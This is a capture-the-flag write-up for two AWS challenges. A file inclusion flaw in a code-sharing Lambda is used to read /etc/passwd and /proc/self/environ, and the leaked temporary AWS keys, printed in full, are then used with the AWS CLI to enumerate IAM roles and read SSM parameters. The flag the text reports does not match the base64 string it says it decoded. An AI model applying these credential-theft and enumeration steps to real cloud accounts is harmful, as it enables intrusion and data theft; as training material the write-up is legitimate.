Sharing is Caring + Sequel
Description
Using Code Sharing Platform, you found the access to the AWS temporary credentials. Now you need to get into the cloud infrastructure and start with the enumeration part, and during this process you will find the flag.
Solution
From the description, I assumed the code sharing platform is refering to the Tony Tony Tony challenge from before.
var codeEditor = CodeMirror.fromTextArea(document.getElementById("code"), {
lineNumbers: true,
mode: "javascript",
theme: "default"
});
var myHeaders = new Headers();
myHeaders.append("authorizationToken", "flag-{gtkO4f4NOrJsRRNZWxiTbL6LLUs5Ir8g}");
myHeaders.append("Content-Type", "application/json");
var raw = JSON.stringify({
"codeFile": code
});
var requestOptions = {
method: 'POST',
headers: myHeaders,
body: raw,
redirect: 'follow'
};
fetch("https://jg0rh6th8e.execute-api.ap-south-1.amazonaws.com/test/share", requestOptions)
.then(response => response.text())
.then(result => {
var resultDiv = document.getElementById("result");
resultDiv.innerHTML = "";
var pre = document.createElement("pre");
pre.innerText = result;
resultDiv.appendChild(pre);
})
.catch(error => console.log('error', error));
However, the code from Tony Tony Tony code sharing platform is incomplete and I cant send any request. Using Postman followed the instructions from the code to send a Post request.
I sent a POST request with random value for the "codeFile" and received a stacktrace error.
After fuzzing around with the "codeFile" variable for a abit, my teammate identified a local file inclusion vulnerability where we can retrieve the /etc/passwd
as a proof of concept.
Viewing the /proc/self/environ
file, we are able to retrieve a set of AWS credentials.
{
"statusCode": 200,
"body": "b'LANG=en_US.UTF-8\\x00_AWS_XRAY_DAEMON_ADDRESS=169.254.79.129\\x00AWS_LAMBDA_LOG_GROUP_NAME=/aws/lambda/ShareCodeFile\\x00AWS_LAMBDA_LOG_STREAM_NAME=2023/04/24/[$LATEST]0a87da37d7f54fd6be10cc5285ce2a29\\x00TZ=:UTC\\x00AWS_DEFAULT_REGION=ap-south-1\\x00PATH=/var/lang/bin:/usr/local/bin:/usr/bin/:/bin:/opt/bin\\x00AWS_XRAY_CONTEXT_MISSING=LOG_ERROR\\x00AWS_SESSION_TOKEN=IQoJb3JpZ2luX2VjEO7//////////wEaCmFwLXNvdXRoLTEiRjBEAiA7qPDiD9q5A6ODkehVjWH6ifRNNOaYvtr84NHZavEGdgIgE3Nosfw5i3Y6Qr3BK7QnTPpmhp4sp3+hUcVqpZSgdAkq+AII5///////////ARAAGgw2MDEyMjY4MDU3NTQiDDZtO29bajA1OvZqVyrMAqq/VlUEgfkEu+GSWDcKgUuuPGNflOFpjXtXTdD1T0PHgmFd4kTYbhcV6hyruiaSSClLog3rwCSSt2DunbSos2kRgcPrzfIOZN48Xp1WP4t1kVi/iL7oDdfc25kmrCteN7t+9KI4UMBTfAEmYk9kkCkWybzhb77f2mYyX1p7shU0lGen6NyaNc9ZNjj0CqUsYy4WPgSKZrVKT/TZ8zxntuWhn6vu+H8g2g9ogg21MA86PvNk2k6DeXzvAjPfaWFRi/cEMMPAYFUmiQrutUBoX2BN2w10by364+96XOmmrYm7U+DEQ7FPiVipVtFnGTEd3UkB9KlJpktXAnYfj7L0ZopqIfDiCGQtw8XolshxRQ1sa4xkjkcQC+Jqu3JYY5vindqK3+OtK8eCrHJ6QLJdBsaI2HmPDqszuAwT+jx2LT3+VNL9ouduMd1SI1h8MKutmKIGOp8BYoGTlNTzJdBP6EeyEYdesaG/QJQr6D5wFFMusA7M8om9pNxeYz6ueDQwUZDatZFLgTNAFtnuZFs32Y0ciSAkSIfnJ/tMKnpA5vAIJ3Q1FM1g7JRCnjbtrJzmQBlLXNSgVecCX3F6/FrbJ8mWEOMhzTGy11Sof7H8z9dhthyWwXRekCC0d5snfn5EI+ljPBtoU28/vB1dp5el4fkm/unP\\x00AWS_EXECUTION_ENV=AWS_Lambda_rapid\\x00LAMBDA_TASK_ROOT=/var/task\\x00LAMBDA_RUNTIME_DIR=/var/runtime\\x00_HANDLER=lambda_function.lambda_handler\\x00AWS_REGION=ap-south-1\\x00_AWS_XRAY_DAEMON_PORT=2000\\x00AWS_LAMBDA_RUNTIME_API=127.0.0.1:9001\\x00AWS_LAMBDA_FUNCTION_VERSION=$LATEST\\x00LD_LIBRARY_PATH=/var/lang/lib:/lib64:/usr/lib64:/var/runtime:/var/runtime/lib:/var/task:/var/task/lib:/opt/lib\\x00AWS_XRAY_DAEMON_ADDRESS=169.254.79.129:2000\\x00AWS_ACCESS_KEY_ID=ASIAYX67JAH5K2K4DN73\\x00AWS_SECRET_ACCESS_KEY=oXqei6pVOd5xMf/sw7AIeaNW6iPbHRQIEqI7Lxy2\\x00AWS_LAMBDA_FUNCTION_NAME=ShareCodeFile\\x00AWS_LAMBDA_FUNCTION_MEMORY_SIZE=128\\x00AWS_LAMBDA_INITIALIZATION_TYPE=on-demand\\x00'"
}
AWS_SESSION_TOKEN=IQoJb3JpZ2luX2VjEO7//////////wEaCmFwLXNvdXRoLTEiRjBEAiA7qPDiD9q5A6ODkehVjWH6ifRNNOaYvtr84NHZavEGdgIgE3Nosfw5i3Y6Qr3BK7QnTPpmhp4sp3+hUcVqpZSgdAkq+AII5///////////ARAAGgw2MDEyMjY4MDU3NTQiDDZtO29bajA1OvZqVyrMAqq/VlUEgfkEu+GSWDcKgUuuPGNflOFpjXtXTdD1T0PHgmFd4kTYbhcV6hyruiaSSClLog3rwCSSt2DunbSos2kRgcPrzfIOZN48Xp1WP4t1kVi/iL7oDdfc25kmrCteN7t+9KI4UMBTfAEmYk9kkCkWybzhb77f2mYyX1p7shU0lGen6NyaNc9ZNjj0CqUsYy4WPgSKZrVKT/TZ8zxntuWhn6vu+H8g2g9ogg21MA86PvNk2k6DeXzvAjPfaWFRi/cEMMPAYFUmiQrutUBoX2BN2w10by364+96XOmmrYm7U+DEQ7FPiVipVtFnGTEd3UkB9KlJpktXAnYfj7L0ZopqIfDiCGQtw8XolshxRQ1sa4xkjkcQC+Jqu3JYY5vindqK3+OtK8eCrHJ6QLJdBsaI2HmPDqszuAwT+jx2LT3+VNL9ouduMd1SI1h8MKutmKIGOp8BYoGTlNTzJdBP6EeyEYdesaG/QJQr6D5wFFMusA7M8om9pNxeYz6ueDQwUZDatZFLgTNAFtnuZFs32Y0ciSAkSIfnJ/tMKnpA5vAIJ3Q1FM1g7JRCnjbtrJzmQBlLXNSgVecCX3F6/FrbJ8mWEOMhzTGy11Sof7H8z9dhthyWwXRekCC0d5snfn5EI+ljPBtoU28/vB1dp5el4fkm/unP
AWS_REGION=ap-south-1
AWS_ACCESS_KEY_ID=ASIAYX67JAH5K2K4DN73
AWS_SECRET_ACCESS_KEY=oXqei6pVOd5xMf/sw7AIeaNW6iPbHRQIEqI7Lxy2
Next, I login using aws configure, and manually append the session token into the ~/.aws/credentials
file
Running aws iam list-roles
returns a bunch of roles
{
"Roles": [
{
"Path": "/service-role/",
"RoleName": "APIAuthorizer-role-htxly2ru",
"RoleId": "AROAYX67JAH5PXCHMU4DI",
"Arn": "arn:aws:iam::601226805754:role/service-role/APIAuthorizer-role-htxly2ru",
"CreateDate": "2023-04-11T05:41:15Z",
"AssumeRolePolicyDocument": {
"Version": "2012-10-17",
"Statement": [
{
"Effect": "Allow",
"Principal": {
"Service": "lambda.amazonaws.com"
},
"Action": "sts:AssumeRole"
}
]
},
"MaxSessionDuration": 3600
},
{
"Path": "/aws-service-role/ops.apigateway.amazonaws.com/",
"RoleName": "AWSServiceRoleForAPIGateway",
"RoleId": "AROAYX67JAH5DPM2D3IHV",
"Arn": "arn:aws:iam::601226805754:role/aws-service-role/ops.apigateway.amazonaws.com/AWSServiceRoleForAPIGateway",
"CreateDate": "2023-04-11T05:04:43Z",
"AssumeRolePolicyDocument": {
"Version": "2012-10-17",
"Statement": [
{
"Effect": "Allow",
"Principal": {
"Service": "ops.apigateway.amazonaws.com"
},
"Action": "sts:AssumeRole"
}
]
},
"Description": "The Service Linked Role is used by Amazon API Gateway.",
"MaxSessionDuration": 3600
},
{
"Path": "/aws-service-role/dynamodb.application-autoscaling.amazonaws.com/",
"RoleName": "AWSServiceRoleForApplicationAutoScaling_DynamoDBTable",
"RoleId": "AROAYX67JAH5GQPRXIFNT",
"Arn": "arn:aws:iam::601226805754:role/aws-service-role/dynamodb.application-autoscaling.amazonaws.com/AWSServiceRoleForApplicationAutoScaling_DynamoDBTable",
"CreateDate": "2023-04-08T16:55:41Z",
"AssumeRolePolicyDocument": {
"Version": "2012-10-17",
"Statement": [
{
"Effect": "Allow",
"Principal": {
"Service": "dynamodb.application-autoscaling.amazonaws.com"
},
"Action": "sts:AssumeRole"
}
]
},
"MaxSessionDuration": 3600
},
{
"Path": "/aws-service-role/ecs.application-autoscaling.amazonaws.com/",
"RoleName": "AWSServiceRoleForApplicationAutoScaling_ECSService",
"RoleId": "AROAYX67JAH5LWWXBCO26",
"Arn": "arn:aws:iam::601226805754:role/aws-service-role/ecs.application-autoscaling.amazonaws.com/AWSServiceRoleForApplicationAutoScaling_ECSService",
"CreateDate": "2023-04-08T19:33:23Z",
"AssumeRolePolicyDocument": {
"Version": "2012-10-17",
"Statement": [
{
"Effect": "Allow",
"Principal": {
"Service": "ecs.application-autoscaling.amazonaws.com"
},
"Action": "sts:AssumeRole"
}
]
},
"MaxSessionDuration": 3600
},
{
"Path": "/aws-service-role/ecs.amazonaws.com/",
"RoleName": "AWSServiceRoleForECS",
"RoleId": "AROAYX67JAH5BZGC632I4",
"Arn": "arn:aws:iam::601226805754:role/aws-service-role/ecs.amazonaws.com/AWSServiceRoleForECS",
"CreateDate": "2023-04-08T18:44:05Z",
"AssumeRolePolicyDocument": {
"Version": "2012-10-17",
"Statement": [
{
"Effect": "Allow",
"Principal": {
"Service": "ecs.amazonaws.com"
},
"Action": "sts:AssumeRole"
}
]
},
"Description": "Role to enable Amazon ECS to manage your cluster.",
"MaxSessionDuration": 3600
},
{
"Path": "/aws-service-role/elasticache.amazonaws.com/",
"RoleName": "AWSServiceRoleForElastiCache",
"RoleId": "AROAYX67JAH5AA2RHP4S2",
"Arn": "arn:aws:iam::601226805754:role/aws-service-role/elasticache.amazonaws.com/AWSServiceRoleForElastiCache",
"CreateDate": "2023-04-08T18:44:08Z",
"AssumeRolePolicyDocument": {
"Version": "2012-10-17",
"Statement": [
{
"Effect": "Allow",
"Principal": {
"Service": "elasticache.amazonaws.com"
},
"Action": "sts:AssumeRole"
}
]
},
"Description": "This policy allows ElastiCache to manage AWS resources on your behalf as necessary for managing your cache.",
"MaxSessionDuration": 3600
},
{
"Path": "/aws-service-role/elasticloadbalancing.amazonaws.com/",
"RoleName": "AWSServiceRoleForElasticLoadBalancing",
"RoleId": "AROAYX67JAH5ID7BXSSCA",
"Arn": "arn:aws:iam::601226805754:role/aws-service-role/elasticloadbalancing.amazonaws.com/AWSServiceRoleForElasticLoadBalancing",
"CreateDate": "2023-04-08T18:44:08Z",
"AssumeRolePolicyDocument": {
"Version": "2012-10-17",
"Statement": [
{
"Effect": "Allow",
"Principal": {
"Service": "elasticloadbalancing.amazonaws.com"
},
"Action": "sts:AssumeRole"
}
]
},
"Description": "Allows ELB to call AWS services on your behalf.",
"MaxSessionDuration": 3600
},
{
"Path": "/aws-service-role/rds.amazonaws.com/",
"RoleName": "AWSServiceRoleForRDS",
"RoleId": "AROAYX67JAH5KGFGF3UWA",
"Arn": "arn:aws:iam::601226805754:role/aws-service-role/rds.amazonaws.com/AWSServiceRoleForRDS",
"CreateDate": "2023-04-08T18:44:07Z",
"AssumeRolePolicyDocument": {
"Version": "2012-10-17",
"Statement": [
{
"Effect": "Allow",
"Principal": {
"Service": "rds.amazonaws.com"
},
"Action": "sts:AssumeRole"
}
]
},
"Description": "Allows Amazon RDS to manage AWS resources on your behalf",
"MaxSessionDuration": 3600
},
{
"Path": "/aws-service-role/support.amazonaws.com/",
"RoleName": "AWSServiceRoleForSupport",
"RoleId": "AROAYX67JAH5OJSEOXQHS",
"Arn": "arn:aws:iam::601226805754:role/aws-service-role/support.amazonaws.com/AWSServiceRoleForSupport",
"CreateDate": "2023-03-10T15:41:26Z",
"AssumeRolePolicyDocument": {
"Version": "2012-10-17",
"Statement": [
{
"Effect": "Allow",
"Principal": {
"Service": "support.amazonaws.com"
},
"Action": "sts:AssumeRole"
}
]
},
"Description": "Enables resource access for AWS to provide billing, administrative and support services",
"MaxSessionDuration": 3600
},
{
"Path": "/aws-service-role/trustedadvisor.amazonaws.com/",
"RoleName": "AWSServiceRoleForTrustedAdvisor",
"RoleId": "AROAYX67JAH5KEKIKCCTX",
"Arn": "arn:aws:iam::601226805754:role/aws-service-role/trustedadvisor.amazonaws.com/AWSServiceRoleForTrustedAdvisor",
"CreateDate": "2023-03-10T15:41:26Z",
"AssumeRolePolicyDocument": {
"Version": "2012-10-17",
"Statement": [
{
"Effect": "Allow",
"Principal": {
"Service": "trustedadvisor.amazonaws.com"
},
"Action": "sts:AssumeRole"
}
]
},
"Description": "Access for the AWS Trusted Advisor Service to help reduce cost, increase performance, and improve security of your AWS environment.",
"MaxSessionDuration": 3600
},
{
"Path": "/",
"RoleName": "ctfd-ecs-task-execution",
"RoleId": "AROAYX67JAH5JV676JWAN",
"Arn": "arn:aws:iam::601226805754:role/ctfd-ecs-task-execution",
"CreateDate": "2023-04-08T18:44:04Z",
"AssumeRolePolicyDocument": {
"Version": "2012-10-17",
"Statement": [
{
"Sid": "ECSAssumeRole",
"Effect": "Allow",
"Principal": {
"Service": "ecs-tasks.amazonaws.com"
},
"Action": "sts:AssumeRole"
}
]
},
"MaxSessionDuration": 3600
},
{
"Path": "/",
"RoleName": "ctfd-secrets-role",
"RoleId": "AROAYX67JAH5N3L6SZDHL",
"Arn": "arn:aws:iam::601226805754:role/ctfd-secrets-role",
"CreateDate": "2023-04-08T18:44:04Z",
"AssumeRolePolicyDocument": {
"Version": "2012-10-17",
"Statement": [
{
"Sid": "ECSTasksAssumeRole",
"Effect": "Allow",
"Principal": {
"Service": "ecs-tasks.amazonaws.com"
},
"Action": "sts:AssumeRole"
}
]
},
"MaxSessionDuration": 3600
},
{
"Path": "/service-role/",
"RoleName": "CustomAPILambdaAuth-role-03rd552i",
"RoleId": "AROAYX67JAH5DDDSFZDDT",
"Arn": "arn:aws:iam::601226805754:role/service-role/CustomAPILambdaAuth-role-03rd552i",
"CreateDate": "2023-04-11T07:28:07Z",
"AssumeRolePolicyDocument": {
"Version": "2012-10-17",
"Statement": [
{
"Effect": "Allow",
"Principal": {
"Service": "lambda.amazonaws.com"
},
"Action": "sts:AssumeRole"
}
]
},
"MaxSessionDuration": 3600
},
{
"Path": "/service-role/",
"RoleName": "OptionsHandler-role-clu7piz8",
"RoleId": "AROAYX67JAH5GUMLLS2HX",
"Arn": "arn:aws:iam::601226805754:role/service-role/OptionsHandler-role-clu7piz8",
"CreateDate": "2023-04-19T11:29:16Z",
"AssumeRolePolicyDocument": {
"Version": "2012-10-17",
"Statement": [
{
"Effect": "Allow",
"Principal": {
"Service": "lambda.amazonaws.com"
},
"Action": "sts:AssumeRole"
}
]
},
"MaxSessionDuration": 3600
},
{
"Path": "/service-role/",
"RoleName": "ShareCodeFile-role-sbutfhkq",
"RoleId": "AROAYX67JAH5GNBPLQTIR",
"Arn": "arn:aws:iam::601226805754:role/service-role/ShareCodeFile-role-sbutfhkq",
"CreateDate": "2023-04-11T05:09:38Z",
"AssumeRolePolicyDocument": {
"Version": "2012-10-17",
"Statement": [
{
"Effect": "Allow",
"Principal": {
"Service": "lambda.amazonaws.com"
},
"Action": "sts:AssumeRole"
}
]
},
"MaxSessionDuration": 3600
}
]
}
The role ShareCodeFile-role-sbutfhkq
seems interesting as the name is same as our user.
Running aws iam list-role-policies --role-name role-name
to list out the names of the inline policies embedded in the specified IAM role
{
"PolicyNames": [
"SSMParametersLISTREAD",
"ZmxhZy17a0drMTlzQmN3TlJua2FyWkZLYW1vS1E0TzZzQzRpSjF9"
]
}
Decoding the base64 strings return the flag
Flag: flag-{GaW6NW8vzwIhh8qU643AV3ohh4gwDByw}
Sharing is Caring Sequel
From the policy name, i make a guess that I have permission to list and read parameters in SSM
Running aws ssm describe-parameters
shows the flag location
I am then able to use aws ssm get-parameter --name "/envcodeshare/test/flag"
to retrieve the flag value
Flag: flag-{fUg3jZueA4J1u7nEVNqLFVASEZcyYjR0}
Last updated